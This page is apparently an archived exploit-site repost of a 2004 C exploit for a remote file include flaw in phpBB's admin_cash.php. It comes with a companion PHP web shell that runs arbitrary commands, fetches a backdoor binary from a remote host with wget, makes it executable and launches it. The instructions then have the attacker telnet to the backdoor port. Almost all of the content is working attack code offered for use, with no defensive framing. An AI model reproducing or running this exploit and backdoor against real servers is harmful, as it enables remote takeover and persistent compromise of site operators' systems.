首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpBB admin_cash.php File Include Vulnerability Exploit
来源:vfocus.net 作者:evilrabbi 发布时间:2004-11-30  

phpBB admin_cash.php File Include Vulnerability Exploit

/*
exploit for phpBB 1.0.0 - 2.0.10

edit the b4b0.php file with the correct url to your backdoor and the
correct filename for your backdoor upload it to
a webserver.

gcc -o b4b0-phpbb b4b0-phpbb.c

/b4b0-phpbb <url_to_system> <phpbb_dir> <url_to_b4b0.php>
telnet <url_of_exploited_system> <port_of_back_door>

greets to b4b0

-- evilrabbi
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);

int main(int argc, char *argv[]) {

struct sockaddr_in trg;
struct hostent *he;

int sockfd, buff;
char buffer[1024];
char *request;

if(argc != 4 ) {
help(argv[0]);
exit(0);
}

he = gethostbyname(argv[1]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(1024);

trg.sin_family = AF_INET;
trg.sin_port = htons(80);
trg.sin_addr = *((struct in_addr *) he->h_addr);
memset(&(trg.sin_zero), '\0', 8);

connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr));
sprintf(request,"GET
http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?cmd=w\n",argv[1],argv[2],argv[3]);
send(sockfd,request,strlen(request),0);
buff=recv(sockfd, buffer, 1024-1, 0);
buffer[buff] = '\0';
printf("%s",buffer);
close(sockfd);
return 0;

}

void help(char *program_name) {

printf("b4b0-phpbb.c by evilrabbi for b4b0\n\n");
printf("%s hostname phpbb2_dir url_to_bad_php\n",program_name);
printf("%s www.example.com phpBB2 blah.com/b4b0.php.php\n",program_name);
}

b4b0.php
b4b0 kickin ass again.......
System was exploited telnet to the port you have your backdoor set to
listen on.
<?
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
system("cd /tmp; wget url_to_backdoor;chmod +x
backdoor_name;./backdoor_name"); // EDIT THIS INFO!!!!!!!!!!!!!
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<",
$output));
?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Soldier of Fortune II <= 1.
·Star Wars Battlefront Fake Pla
·Atari800 v.1.3.0 Local Root Ex
·WS_FTP Server MKD Buffer Overf
·Mercury Mail 4.01 (Pegasus) IM
·Serious engine Fake Players Do
·php <= 4.3.7 and <= 5.0.
·Mercury Mail 4.01 IMAP Buffer
·MailEnable IMAP service Remote
·Orbz Buffer Overflow Exploit
·Winamp <= 5.06 'IN_CDDA.dll
·word-list-compress local explo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved